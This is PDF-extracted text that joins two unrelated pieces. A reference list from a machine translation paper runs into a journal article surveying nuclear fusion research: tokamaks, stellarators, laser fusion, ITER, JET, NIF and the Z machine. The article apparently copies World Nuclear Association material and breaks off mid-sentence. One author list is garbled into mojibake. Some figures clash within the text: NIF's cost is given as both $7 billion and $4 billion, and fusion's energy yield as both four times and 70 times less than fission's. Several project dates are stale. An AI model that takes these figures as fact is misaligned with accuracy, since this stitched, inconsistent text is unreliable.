corpora. Computational Linguistics, 23:377-404. Trevor Cohn and Phil Blunsom. 2009. A bayesian model of syntax-directed tree to string grammar induction. In Proc. of EMNLP 2009, pages 352-361. Trevor Cohn, Phil Blunsom, and Sharon Goldwater. 2010. Inducing tree-substitution grammars. Journal of Machine Learning Research, pages 3053-3096. Brooke Cowan, Ivona Kucerova and Michael Collins. 2006. A discriminative model for tree-to-tree translation. In Proc. of EMNLP 2006, pages 232-241. John DeNero and Dan Klein. 2007. Tailoring word alignments to syntactic machine translation. In Proc. of ACL 2007, pages 17-24. John DeNero and Jakob Uszkoreit. 2011. Inducing sentence structure from parallel corpora for reordering. In Proc. of EMNLP 2011, pages 193-203. Chris Dyer. 2010. Two monolingual parses are better than one (synchronous parse). In Proc. of NAACL 2010, pages 263-266. Jason Eisner. 2003. Learning non-isomorphic tree mappings for machine translation. In Proc. of ACL 2003, pages 205-208. Michel Galley, Mark Hopkins, Kevin Knight and Daniel Marcu. 2004. What’s in a translation rule. In Proc. of HLT-NAACL 2004, pages 273–280. Michel Galley, Jonathan Graehl, Kevin Knight, Daniel Marcu, Steve DeNeefe, Wei Wang and Ignacio Thayer. 2006. Scalable inference and training of context-rich syntactic translation models. In Proc. of ACL-COLING 2006, pages 961-968. Jonathan Weese, Juri Ganitkevitch, Chris Callison- Burch, Matt Post and Adam Lopez. 2011. Joshua 3.0: syntax-based machine translation with the thrax Grammar Extractor. In Proc of WMT11, pages 478- 484. Liang Huang, Kevin Knight and Aravind Joshi. 2006. A syntax-directed translator with extended domain of locality. In Proc. of AMTA 2006, pages 65-73. Philipp Koehn, Franz Och, and Daniel Marcu. 2003. Statistical phrase-based translation, In Proc. of HLT/NAACL 2003, pages 48-54. 253 Philipp Koehn. 2004. Statistical significance tests for machine translation evaluation. In Proc. of EMNLP 2004, pages 388–395. Philipp Koehn, Hieu Hoang, Alexandra Birch, Chris Callison-Burch, Marcello Federico, Nicola Bertoldi, Brooke Cowan, Wade Shen, Christine Moran, RichDUG� =HQV�� &KULV� '\HU� DQG� 2QGĜHM� %RMDU. 2007. Moses: open source toolkit for statistical machine translation. In Proc. of ACL 2007, pages 177-180. Abby Levenberg, Chris Dyer and Phil Blunsom. 2012. A bayesian model for learning SCFGs with discontiguous Rules. In Proc. of EMNLP 2012, pages 223-232. Zhifei Li, Chris Callison-Burch, Chris Dyer, Juri Ganitkevitch, Sanjeev Khudanpur, Lane Schwartz, Wren N.G. Thornton, Jonathan Weese and Omar F. Zaidan. 2009. Joshua: An open source toolkit for parsing-based machine translation. In Proc. of ACL 2009, pages 135-139. Shujie Liu, Chi-Ho Li, Mu Li, Ming Zhou. 2012. Re- training monolingual parser bilingually for syntactic SMT. In Proc. of EMNLP 2012, pages 854-862. Yang Liu, Qun Liu and Shouxun Lin. 2006. Tree-to- string alignment template for statistical machine translation. In Proc. of ACL-COLING 2006, pages 609-616. Yang Liu, Yajuan Lv and Qun Liu. 2009. Improving tree-to-tree translation with packed forests. In Proc. of ACL-IJCNLP 2009, pages 558-566. Daniel Marcu, Wei Wang, Abdessamad Echihabi and Kevin Knight. 2006. SPMT: Statistical machine translation with syntactified target language phrases. In Proc. of EMNLP 2006, pages 44-52. Franz Och, 2003. Minimum error rate training in statistical machine translation. In Proc. of ACL 2003, pages 160-167. Kishore Papineni, Salim Roukos, Todd Ward, and Wei- Jing Zhu. 2002. BLEU: A method for automatic evaluation of machine translation. In Proc. of ACL 2002, pages 311-318. Slav Petrov, Leon Barrett, Romain Thibaux and Dan Klein. 2006. Learning accurate, compact, and interpretable tree annotation. In Proc. of COLING- ACL 2006, pages 433-440. Chris Quirk, Arul Menezes and Colin Cherry. 2005. Dependency treelet translation: syntactically informed phrasal SMT. In Proc. of ACL 2005, pages 271-279. Libin Shen, Jinxi Xu and Ralph Weischedel. 2008. A new string-to-dependency machine translation algorithm with a target dependency language model. In Proc. of ACL-08, pages 577-585. Wei Wang, Kevin Knight, and Daniel Marcu. 2007. Binarizing syntax trees to improve syntax-based machine translation accuracy. In Proc. of EMNLP 2007, pages 746-754. Wei Wang, Jonathan May, Kevin Knight, and Daniel Marcu. 2010. Re-structuring, re-labeling, and re- aligning for syntax-based machine translation. Computational Linguistics, 36(2):247–277. Feifei Zhai, Jiajun Zhang, Yu Zhou and Chengqing Zong. 2012. Tree-based translation without using parse trees. In Proc. of COLING 2012, pages 3037- 3054. Hao Zhang, Liang Huang, Daniel Gildea and Kevin Knight. 2006. Synchronous binarization for machine translation. In Proc. of HLT-NAACL 2006, pages 256-263. Hao Zhang, Daniel Gildea, and David Chiang. 2008. Extracting synchronous grammars rules from word level alignments in linear time. In Proc. of COLING 2008, pages 1081-1088. Hao Zhang, Licheng Fang, Peng Xu, Xiaoyun Wu. 2011a. Binarized forest to string translation. In Proc. of ACL 2011, pages 835-845. Hui Zhang, Min Zhang, Haizhou Li, Aiti Aw, Chew Lim Tan. 2009. Forest-based tree sequence to string translation model. In Proc. of ACL-IJCNLP 2009, pages 172-180. Jiajun Zhang, Feifei Zhai and Chengqing Zong. 2011b. Augmenting string-to-tree translation models with fuzzy use of source-side syntax. In Proc. of EMNLP 2011, pages 204-215. Min Zhang, Hongfei Jiang, Ai Ti Aw, Jun Sun, Chew Lim Tan and Sheng Li. 2007. A tree-to-tree alignment-based model for statistical Machine translation. MT-Summit-07. pages 535-542 Min Zhang, Hongfei Jiang, Ai ti Aw, Haizhou Li, Chew Lim Tan and Sheng Li. 2008. A tree sequence alignment-based tree-to-tree translation model. In Proc. of ACL 2008, pages 559-567. Andreas Zollmann and Ashish Venugopal. 2006. Syntax augmented machine translation via chart parsing. In Proc. of Workshop on Statistical Machine Translation 2006, pages 138-141. Andreas Zollmann and Stephan Vogel. 2011. A word- class approach to labeling PSCFG rules for machine translation. In Proc. of ACL 2011, pages 1-11. 254 work_vcct7l7el5bixfvlltqxknqsyq ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 DOI: 10.21307/ijanmc-2019-064 1 Nuclear Fusion Power – An Overview of History, Present and Future Stewart C. Prager Department of Physics University of Wisconsin – Madison Madison, WI 53706, USA E-mail: scprager@wisc.edu Summary—Fusion power offers the prospect of an almost inexhaustible source of energy for future generations, but it also presents so far insurmountable engineering challenges. The fundamental challenge is to achieve a rate of heat emitted by a fusion plasma that exceeds the rate of energy injected into the plasma. The main hope is centered on tokamak reactors and stellarators which confine deuterium-tritium plasma magnetically. Keywords-Fusion Energy; Hydrogen Power; Nuclear Fusion I. INTRODUCTION Today, many countries take part in fusion research to some extent, led by the European Union, the USA, Russia and Japan, with vigorous programs also underway in China, Brazil, Canada, and Korea. Initially, fusion research in the USA and USSR was linked to atomic weapons development, and it remained classified until the 1958 Atoms for Peace conference in Geneva. Following a breakthrough at the Soviet tokamak, fusion research became 'big science' in the 1970s. But the cost and complexity of the devices involved increased to the point where international co- operation was the only way forward. Fusion powers the Sun and stars as hydrogen atoms fuse together to form helium, and matter is converted into energy. Hydrogen, heated to very high temperatures changes from a gas to plasma in which the negatively-charged electrons are separated from the positively-charged atomic nuclei (ions). Normally, fusion is not possible because the strongly repulsive electrostatic forces between the positively charged nuclei prevent them from getting close enough together to collide and for fusion to occur. However, if the conditions are such that the nuclei can overcome the electrostatic forces to the extent that they can come within a very close range of each other, then the attractive nuclear force (which binds protons and neutrons together in atomic nuclei) between the nuclei will outweigh the repulsive (electrostatic) force, allowing the nuclei to fuse together. Such conditions can occur when the temperature increases, causing the ions to move faster and eventually reach speeds high enough to bring the ions close enough together. The nuclei can then fuse, causing a release of energy. II. FUSION TECHNOLOGY In the Sun, massive gravitational forces create the right conditions for fusion, but on Earth they are much harder to achieve. Fusion fuel – different isotopes of hydrogen – must be heated to extreme temperatures of the order of 50 million degrees Celsius, and must be kept stable under intense pressure, hence dense enough and confined for long enough to allow the nuclei to fuse. The aim of the controlled fusion research program is to achieve 'ignition', which occurs when enough fusion reactions take place for the process to become self-sustaining, with fresh fuel then being added to continue it. Once ignition is achieved, there is net energy yield – about four times as much as with nuclear fission. According to the Massachusetts Institute of Technology (MIT), the amount of power produced increases with the square of the pressure, so doubling the pressure leads to a fourfold increase in energy production. With current technology, the reaction most readily feasible is between the nuclei of the two heavy forms (isotopes) of hydrogen – deuterium (D) and tritium (T). Each D-T fusion event releases 17.6 MeV (2.8 x 10 - 12 joule, compared with 200 MeV for a U-235 fission and 3-4 MeV for D-D fusion). a On a mass basis, the D- T fusion reaction releases over four times as much energy as uranium fission. Deuterium occurs naturally in seawater (30 grams per cubic metre), which makes it very abundant relative to other energy resources. Tritium occurs naturally only in trace quantities (produced by cosmic rays) and is radioactive, with a half-life of around 12 years. Usable quantities can be made in a conventional nuclear reactor, or in the present context, bred in a fusion system from lithium. https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#Notes International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 2 b Lithium is found in large quantities (30 parts per million) in the Earth's crust and in weaker concentrations in the sea. In a fusion reactor, the concept is that neutrons generated from the D-T fusion reaction will be absorbed in a blanket containing lithium which surrounds the core. The lithium is then transformed into tritium (which is used to fuel the reactor) and helium. The blanket must be thick enough (about 1 metre) to slow down the high-energy (14 MeV) neutrons. The kinetic energy of the neutrons is absorbed by the blanket, causing it to heat up. The heat energy is collected by the coolant (water, helium or Li- Pb eutectic) flowing through the blanket and, in a fusion power plant, this energy will be used to generate electricity by conventional methods. If insufficient tritium is produced, some supplementary source must be employed such as using a fission reactor to irradiate heavy water or lithium with neutrons, and extraneous tritium creates difficulties with handling, storage and transport. The difficulty has been to develop a device that can heat the D-T fuel to a high enough temperature and confine it long enough so that more energy is released through fusion reactions than is used to get the reaction going. While the D-T reaction is the main focus of attention, long-term hopes are for a D-D reaction, but this requires much higher temperatures. In any case, the challenge is to apply the heat to human needs, primarily generating electricity. The energy density of fusion reactions in gas is very much less than for fission reactions in solid fuel, and as noted the heat yield per reaction is 70 times less. Hence thermonuclear fusion will always have a much lower power density than nuclear fission, which means that any fusion reactor needs to be larger and therefore more costly, than a fission reactor of the same power output. In addition, nuclear fission reactors use solid fuel which is denser than thermonuclear plasma, so the energy released is more concentrated. Also the neutron energy from fusion is higher than from fission – 14.1 MeV instead of about 2 MeV, which presents significant challenges regarding structural materials. At present, two main experimental approaches are being studied: magnetic confinement and inertial confinement. The first method uses strong magnetic fields to contain the hot plasma. The second involves compressing a small pellet containing fusion fuel to extremely high densities using strong lasers or particle beams. III. MAGNETIC CONFINEMENT In magnetic confinement fusion (MCF), hundreds of cubic metres of D-T plasma at a density of less than a milligram per cubic metre are confined by a magnetic field at a few atmospheres pressure and heated to fusion temperature. Magnetic fields are ideal for confining a plasma because the electrical charges on the separated ions and electrons mean that they follow the magnetic field lines. The aim is to prevent the particles from coming into contact with the reactor walls as this will dissipate their heat and slow them down. The most effective magnetic configuration is toroidal, shaped like a doughnut, in which the magnetic field is curved around to form a closed loop. For proper confinement, this toroidal field must have superimposed upon it a perpendicular field component (a poloidal field). The result is a magnetic field with force lines following spiral (helical) paths that confine and control the plasma. There are several types of toroidal confinement system, the most important being tokamaks, stellarators and reversed field pinch (RFP) devices. In a tokamak, the toroidal field is created by a series of coils evenly spaced around the torus-shaped reactor, and the poloidal field is created by a system of horizontal coils outside the toroidal magnet structure. A strong electric current is induced in the plasma using a central solenoid, and this induced current also contributes to the poloidal field. In a stellarator, the helical lines of force are produced by a series of coils which may themselves be helical in shape. Unlike tokamaks, stellarators do not require a toroidal current to be induced in the plasma. RFP devices have the same toroidal and poloidal components as a tokamak, but the current flowing through the plasma is much stronger and the direction of the toroidal field within the plasma is reversed. In tokamaks and RFP devices, the current flowing through the plasma also serves to heat it to a temperature of about 10 million degrees Celsius. Beyond that, additional heating systems are needed to achieve the temperatures necessary for fusion. In stellarators, these heating systems have to supply all the energy needed. The tokamak (toroidalnya kamera ee magnetnaya katushka–torus-shaped magnetic chamber) was designed in 1951 by Soviet physicists Andrei Sakharov and Igor Tamm. Tokamaks operate within limited parameters outside which sudden losses of energy confinement (disruptions) can occur, causing major thermal and mechanical stresses to the structure and https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#Notes International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 3 walls. Nevertheless, it is considered the most promising design, and research is continuing on various tokamaks around the world. Research is also being carried out on several types of stellarator. Lyman Spitzer devised and began work on the first fusion device – a stellarator–at the Princeton Plasma Physics Laboratory in 1951. Due to the difficulty in confining plasmas, stellarators fell out of favour until computer modelling techniques allowed accurate geometries to be calculated. Because stellarators have no toroidal plasma current, plasma stability is increased compared with tokamaks. Since the burning plasma can be more easily controlled and monitored, stellerators have an intrinsic potential for steady-state, continuous operation. The disadvantage is that, due to their more complex shape, stellarators are much more complex than tokamaks to design and build. RFP devices differ from tokamaks mainly in the spatial distribution of the toroidal magnetic field, which changes sign at the edge of the plasma. The RFX machine in Padua, Italy is used to study the physical problems arising from the spontaneous reorganisation of the magnetic field, which is an intrinsic feature of this configuration. IV. INERTIAL CONFINEMENT In inertial confinement fusion, which is a newer line of research, laser or ion beams are focused very precisely onto the surface of a target, which is a pellet of D-T fuel, a few millimetres in diameter. This heats the outer layer of the material, which explodes outwards generating an inward-moving compression front or implosion that compresses and heats the inner layers of material. The core of the fuel may be compressed to one thousand times its liquid density, resulting in conditions where fusion can occur. The energy released then would heat the surrounding fuel, which may also undergo fusion leading to a chain reaction (known as ignition) as the reaction spreads outwards through the fuel. The time required for these reactions to occur is limited by the inertia of the fuel (hence the name), but is less than a microsecond. So far, most inertial confinement work has involved lasers. Recent work at Osaka University's Institute of Laser Engineering in Japan suggests that ignition may be achieved at lower temperature with a second very intense laser pulse guided through a millimetre-high gold cone into the compressed fuel, and timed to coincide with the peak compression. This technique, known as 'fast ignition', means that fuel compression is separated from hot spot generation with ignition, making the process more practical. A completely different concept, the 'Z-pinch' (or 'zeta pinch'), uses a strong electrical current in a plasma to generate X-rays, which compress a tiny D-T fuel cylinder. V. MAGNETIZED TARGET FUSION Magnetized target fusion (MTF), also referred to as magneto-inertial fusion (MIF), is a pulsed approach to fusion that combines the compressional heating of inertial confinement fusion with the magnetically reduced thermal transport and magnetically enhanced alpha heating of magnetic confinement fusion. A range of MTF systems are currently being experimented with, and commonly use a magnetic field to confine a plasma with compressional heating provided by laser, electromagnetic or mechanical liner implosion. As a result of this combined approach, shorter plasma confinement times are required than for magnetic confinement (from 100 ns to 1 ms, depending on the MIF approach), reducing the requirement to stabilize the plasma for long periods. Conversely, compression can be achieved over timescales longer than those typical for inertial confinement, making it possible to achieve compression through mechanical, magnetic, chemical, or relatively low-powered laser drivers. Several approaches are underway to examine MTF, including experiments at Los Alamos National Laboratory, Sandia National Laboratory, the University of Rochester, and private companies General Fusion and Helion Energy. R&D challenges for MTF include whether a suitable target plasma can be formed and heated to fusion conditions while avoiding contamination from the liner, as with magnetic confinement and inertial confinement. Due to the reduced demands on confinement time and compression velocities, MTF has been pursued as a lower-cost and simpler approach to investigating these challenges than conventional fusion projects. VI. HYBRID FUSION Fusion can also be combined with fission in what is referred to as hybrid nuclear fusion where the blanket surrounding the core is a subcritical fission reactor. The fusion reaction acts as a source of neutrons for the surrounding blanket, where these neutrons are captured, resulting in fission reactions taking place. These fission reactions would also produce more neutrons, thereby assisting further fission reactions in the blanket. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 4 The concept of hybrid fusion can be compared with an accelerator-driven system (ADS), where an accelerator is the source of neutrons for the blanket assembly, rather than nuclear fusion reactions (see page on Accelerator-driven Nuclear Energy). The blanket of a hybrid fusion system can therefore contain the same fuel as an ADS – for example, the abundant element thorium or the long-lived heavy isotopes present in used nuclear fuel (from a conventional reactor) could be used as fuel. The blanket containing fission fuel in a hybrid fusion system would not require the development of new materials capable of withstanding constant neutron bombardment, whereas such materials would be needed in the blanket of a 'conventional' fusion system. A further advantage of a hybrid system is that the fusion part would not need to produce as many neutrons as a (non-hybrid) fusion reactor would in order to generate more power than is consumed – so a commercial-scale fusion reactor in a hybrid system does not need to be as large as a fusion-only reactor. VII. FUSION RESEARCH A long-standing quip about fusion points out that, since the 1970s, commercial deployment of fusion power has always been about 40 years away. While there is some truth in this, many breakthroughs have been made, particularly in recent years, and there are a number of major projects under development that may bring research to the point where fusion power can be commercialized. Several tokamaks have been built, including the Joint European Torus (JET) and the Mega Amp Spherical Tokamak (MAST)in the UK and the tokamak fusion test reactor (TFTR) at Princeton in the USA. The ITER (International Thermonuclear Experimental Reactor) project currently under construction in Cadarache, France will be the largest tokamak when it operates in the 2020s. The Chinese Fusion Engineering Test Reactor (CFETR) is a tokamak which is reported to be larger than ITER, and due for completion in 2030.Meanwhile it is running its Experimental Advanced Superconducting Tokamak (EAST). Much research has also been carried out on stellarators. A large one of these, the Large Helical Device at Japan's National Institute of Fusion Research, began operating in 1998. It is being used to study the best magnetic configuration for plasma confinement. At the Garching site of the Max Planck Institute for Plasma Physics in Germany, research carried out at the Wendelstein 7-AS between 1988 and 2002 is being progressed at the Wendelstein 7-X, which was built over 19 years at Max Planck Institute's Greifswald site and started up at the end of 2015.Another stellarator, TJII, is in operation in Madrid, Spain. In the USA, at Princeton Plasma Physics Laboratory, where the first stellarators were built in 1951, construction on the NCSX stellerator was abandoned in 2008 due to cost overruns and lack of funding 2 . There have also been significant developments in research into inertial fusion energy (IFE). Construction of the $7 billion National Ignition Facility (NIF) at the Lawrence Livermore National Laboratory (LLNL), funded by the National Nuclear Security Administration, was completed in March 2009. The Laser Mégajoule (LMJ) in France’s Bordeaux region started operation in October 2014. Both are designed to deliver, in a few billionths of a second, nearly two million joules of light energy to targets measuring a few millimeters in size. The main purpose of both NIF and LMJ is for research to support both countries' respective nuclear weapons programs. VIII. ITER In 1985, the Soviet Union suggested building a next generation tokamak with Europe, Japan and the USA. Collaboration was established under the auspices of the International Atomic Energy Agency (IAEA). Between 1988 and 1990, the initial designs were drawn up for an International Thermonuclear Experimental Reactor (ITER, which also means 'a path' or 'journey' in Latin) with the aim of proving that fusion could produce useful energy. The four parties agreed in 1992 to collaborate further on engineering design activities for ITER. Canada and Kazakhstan are also involved through Euratom and Russia, respectively. Six years later, the ITER Council approved the first comprehensive design of a fusion reactor based on well-established physics and technology with a price tag of $6 billion. Then the USA decided pull out of the project, forcing a 50% reduction in costs and a redesign. The result was the ITER Fusion Energy Advanced Tokomak (ITER-FEAT) – initially expected to cost $3 billion but still achieve the targets of a self-sustaining reaction and a net energy gain. The envisaged energy gain is unlikely to be enough for a power plant, but it should demonstrate feasibility. In 2003, the USA rejoined the project and China also announced it would join. After deadlocked discussion, the six partners agreed in mid-2005 to site ITER at Cadarache, in southern France. The deal involved major concessions to Japan, which had put forward Rokkasho as a preferred site. The European https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#References International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 5 Union (EU) and France would contribute half of the then estimated €12.8 billion total cost, with the other partners – Japan, China, South Korea, USA and Russia – putting in 10% each. Japan will provide a lot of the high-tech components, will host a €1 billion materials testing facility – the International Fusion Materials Irradiation Facility (IFMIF) – and will have the right to host a subsequent demonstration fusion reactor. India became the seventh member of the ITER consortium at the end of 2005. In November 2006, the seven members – China, India, Japan, Russia, South Korea, the USA and the European Union – signed the ITER implementing agreement. The total cost of the 500 MW ITER comprises about half for the ten-year construction and half for 20 years of operation. Site preparation works at Cadarache commenced in January 2007. First concrete for the buildings was poured in December 2013. Experiments were due to begin in 2018, when hydrogen will be used to avoid activating the magnets, but this is now expected in 2025. The first D-T plasma is not expected until 2035.ITER is large because confinement time increases with the cube of machine size. The vacuum vessel will be 19 m across and 11 m high, and weigh more than 5000 tonnes. The goal of ITER is to operate with a plasma thermal output of 500 MW (for at least 400 seconds continuously) with less than 50 MW of plasma heating power input. No electricity will be generated at ITER. An associated CEA facility at Cadarache is WEST, formerly Tore Supra, which is designed to test prototype components and accelerate their development for ITER. It is focused on the divertor structure to remove helium, testing the durability of tungsten materials used. A 2 GW Demonstration Power Plant, known as Demo, is expected to demonstrate large-scale production of electrical power on a continual basis. The conceptual design of Demo was expected to be completed by 2017, with construction beginning around 2024 and the first phase of operation commencing from 2033. It has since been delayed, with construction now planned for after 2040. IX. JET In 1978, the European Community (Euratom, along with Sweden and Switzerland) launched the Joint European Torus (JET) project in the UK. JET is the largest tokamak operating in the world today. A similar tokamak, JT-60, operates at the Naka Fusion Institute of Japan Atomic Energy Agency in Japan, but only JET has the facilities to use D-T fuel. Following a legal dispute with Euratom, in December 1999 JET's international contract ended and the United Kingdom Atomic Energy Authority (UKAEA) took over the management of JET on behalf of its European partners. From that time JET's experimental programme has been co-ordinated by the European Fusion Development Agreement (EFDA) parties. c JET produced its first plasma in 1983, and became the first experiment to produce controlled fusion power in November 1991, albeit with high input of electricity. Up to 16 MW of fusion power for one second and 5 MW sustained has been achieved in D-T plasmas using the device, from 24 MW of power injected into its heating system, and many experiments are conducted to study different heating schemes and other techniques. JET has been very successful in operating remote handling techniques in a radioactive environment to modify the interior of the device and has shown that the remote handling maintenance of fusion devices is realistic. JET is a key device in preparations for ITER. It has been significantly upgraded in recent years to test ITER plasma physics and engineering systems. Further enhancements are planned at JET with a view to exceeding its fusion power record in future D-T experiments. A compact device – Mega Amp Spherical Tokamak (MAST) – is also being developed alongside JET, partly to serve the ITER project. X. KSTAR The KSTAR (Korean Superconducting Tokamak Reactor) at the National Fusion Research Institute (NFRI) in Daejeon produced its first plasma in mid- 2008. It is a pilot device for ITER, and involves much international collaboration. It will be a satellite of ITER during ITER’s operational phase from the early 2020s. The tokamak with 1.8 metre major radius is the first to use Nb3Sn superconducting magnets, the same material to be used in the ITER project. Its first stage of development to 2012 was to prove baseline operation technologies and achieved plasma pulses of up to 20 seconds. For the second phase of development (2013-2017), KSTAR was upgraded to study long pulses of up to 300 seconds in H mode–the 100s target was in 2015–and embark upon high-performance AT mode. It achieved 70 seconds in high-performance plasma operation in late 2016, a world record. In addition, KSTAR researchers also succeeded in achieving an alternative advanced plasma operation https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#Notes International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 6 mode with the internal transport barrier (ITB). This is a steep pressure gradient in the core of the plasmas due to the enhanced core plasma confinement. NFRI said this is the first ITB operation achieved in the superconducting device at the lowest heating power. KSTAR Phase 3 (2018-2023) is to develop high performance, high efficiency AT mode technologies with long-pulse operation. Phase 4 (2023-2025) will test DEMO-related prior arts. The device does not have tritium handling capabilities, so will not use D-T fuel. XI. K-DEMO TOKAMAK In collaboration with the US Department of Energy's Princeton Plasma Physics Laboratory (PPPL) in New Jersey and South Korea’s National Fusion Research Institute (NFRI) K-DEMO is intended to be the next step toward commercial reactors from ITER, and would be the first plant to actually contribute power to an electric grid. According to the PPPL, it would generate "some 1 billion watts of power for several weeks on end", a much greater output than ITER's goal of producing 500 million watts for 500 seconds by the late 2020s. K-DEMO is expected to have a 6.65m diameter major radius tokamak, and a test blanket module as part of the DEMO breeding blanket R&D. The Ministry of Education, Science and Technology plans to invest about KRW 1 trillion (US$ 941 million) in the project. About KRW 300 billion of that spending has already been funded. The government expects the project to employ nearly 2,400 people in the first phase, which will last throughout 2016. K-DEMO is expected to have an initial operational phase from about 2037 to 2050 to develop components for the second stage, which would produce electricity. XII. EAST In China the Experimental Advanced Superconducting Tokamak (EAST) at China Academy of Sciences Hefei Institute of Physical Science (CASHIPS) produced hydrogen plasma at 50 million degrees Celsius and held it for 102 seconds in 2017. In November 2018 it achieved 100 million degrees Celsius for 10 seconds, with input of 10 MW of electric power. A. TFTR In the USA, the Tokamak Fusion Test Reactor (TFTR) operated at the Princeton Plasma Physics Laboratory (PPPL) from 1982 to 1997. d In December 1993, TFTR became the first magnetic fusion device to perform extensive experiments with plasmas composed of D-T. The following year TFTR produced 10.7 MW of controlled fusion power – a record at that time. TFTR set other records, including the achievement of a plasma temperature of 510 million degrees centigrade in 1995. However, it did not achieve its goal of break- even fusion energy (where the energy input required is no greater than the amount of fusion energy produced), but achieved all of its hardware design goals, thus making substantial contributions to the development of ITER. B. ALCATOR At the Massachusetts Institute of Technology (MIT) since the 1970s a succession of small ALCATOR (Alto Campus Torus) high magnetic field torus reactors have operated on the principle of achieving high plasma pressure as the route to long plasma confinement. Alcator C-Mod is claimed to have the highest magnetic field and highest plasma pressure of any fusion reactor, and is the largest university-based fusion reactor in the world. It operated 1993-2016. In September 2016 it achieved a plasma pressure of 2.05 atmospheres at a temperature of 35 million degrees Celsius. The plasma produced 300 trillion fusion reactions per second and had a central magnetic field strength of 5.7 tesla. It carried 1.4 million amps of electrical current and was heated with over 4 MW of power. The reaction occurred in a volume of approximately 1 cubic metre and the plasma lasted for two seconds. Having achieved this record performance for a fusion reactor, government funding ceased. A scaled-up version planned to be built at Triotsk near Moscow in collaboration with the Kurchatov Institute is Ignitor, with 1.3 m diameter torus. XIII. LARGE HELICAL DEVICE– STELLARATOR The Large Helical Device (LHD) at Japan's National Institute for Fusion Science in Toki, in the Gifu Prefecture, was the world's largest stellarator. LHD produced its first plasma in 1998 and has demonstrated plasma confinement properties comparable to other large fusion devices. It has achieved an ion temperature of 13.5 keV (about 160 million degrees) and plasma stored energy of 1.44 million joules (MJ). XIV. WENDELSTEIN 7-X STELLARATOR Following a year of tests, this started up at the end of 2015, and helium plasma briefly reached about one million degrees centigrade.In 2016 it progressed to using hydrogen, and using 2 MW it achieved plasma of 80 million degrees centigrade for a quarter of a second. W7-X is the world’s largest stellarator and it is planned to operate continuously for up to 30 minutes. It cost €1 billion ($1.1 billion). https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#Notes International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 7 XV. HELIAC-1 STELLARATOR At the Australian Plasma Fusion Research Facilityat the Australian National University the H-1 stellarator has run for some years and in 2014 was upgraded significantly. H-1 is capable of accessing a wide range of plasma configurations and allows exploration of ideas for improved magnetic design of the fusion power stations that will follow ITER. XVI. NATIONALIGNITIONFACILITY– LASER The world's most powerful laser fusion facility, the $4 billion National Ignition Facility (NIF) at Lawrence Livermore National Laboratory (LLNL), was completed in March 2009. Using its 192 laser beams, NIF is able to deliver more than 60 times the energy of any previous laser system to its target e . LLNL announced in July 2012 that in "an historic record- breaking laser shot, the NIF laser system of 192 beams delivered more than 500 TW of peak power and 1.85 megajoules(MJ) of ultraviolet laser light to its (2mm diameter) target" for a few trillionths of a second. It was reported that in September 2013 at NIF for the first time the amount of energy released through the fusion reaction exceeded the amount of energy being absorbed by the fuel, but not the amount supplied by the giant lasers. Publication of this in 2014 said 17 kJ was released. An earlier high-power laser at LLNL, Nova, was built in 1984 for the purpose of achieving ignition. Nova failed to do this and was closed in 1999, but provided essential data that led to the design of NIF. Nova also generated considerable amounts of data on high-density matter physics, which is useful both in fusion power and nuclear weapons research. In connection with NIF, LLNL is developing the Laser Inertial Fusion Engine (LIFE), a hybrid fusion system where neutrons resulting from laser fusion would drive a subcritical nuclear fission blanket to generate electricity. The blanket would contain either depleted uranium; used nuclear fuel; natural uranium or thorium; or plutonium-239, minor actinides and fission products from reprocessed used nuclear fuel [4] . XVII. LASER MÉGAJOULE Meanwhile, the French Atomic Energy Commission (Commissariat à l'énergieatomique, CEA) has operated a similar size laser – the Laser Mégajoule (LMJ) – near Bordeaux since 2014. Its 240 laser beams are able to generate 1.8 MJ pulses for a few billionths of a second, concentrated on a small deuterium and tritium target. A prototype laser, the Ligned'Integration Laser (LIL), commenced operation in 2003. XVIII. SG-II China’s National Laboratory of High-Power Laser and Physics, associated with the China Academy of Science, has a laser inertial confinement experiment in Shanghai – the Shenguang-II eight-beam laser facility (SG-II), similar to the National Ignition Facility in the USA and Laser Mégajoule in France. It is the only high power neodymium-glass solid laser facility with an active probe light in China. In 2005 a ninth beam was added, advancing the capacity for fusion research. The SG-II facility is China’s high-power laser technology international demonstration base. XIX. PETAL AND HIPER LASERS The Petawatt Aquitaine Laser (PETAL) laser facility is a high energy multi-petawatt laser (3.5 kJ energy with a duration of 0.5 to 5 ps) under construction near Bordeaux, on the same site as LIL. PETAL will be coupled with LIL to demonstrate the physics and laser technology of fast ignition. First experiments are expected in 2012. The High Power Laser Energy Research Facility (HiPER) is being designed to build on the research planned at the PETAL project. HiPER will use a long pulse laser (currently estimated at 200kJ) combined with a 70kJ short pulse laser. A three-year preparatory phase that commenced in 2008 has direct funding or in-kind commitments amounting to around €70 million from several countries. The detailed engineering phase is projected to begin in 2011, with a six-year construction phase possibly commencing by 2014. XX. Z MACHINE Operated by Sandia National Laboratories, the Z machine is the largest X-ray generator in the world. As with NIF, the facility was built as part of the country's Stockpile Stewardship Program, which aims to maintain the stockpile of nuclear weapons without the need for full-scale testing. Conditions for fusion are achieved by passing a powerful electrical pulse f (lasting less than 100 nanoseconds) through a set of fine tungsten wires inside a metal hohlraum g . The wires turn into a plasma and experience a compression ('Z-pinch'), forcing the vapourized particles to collide with each other, thereby producing intense X-ray radiation. A tiny cylinder containing fusion fuel placed inside the hohlraum would therefore be compressed by the X-rays, allowing fusion to occur. In 2006, Z machine had achieved temperatures of over 2 billion degrees [6] ,considerably higher than what https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#Notes https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#References https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#Notes https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#Notes https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#References International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 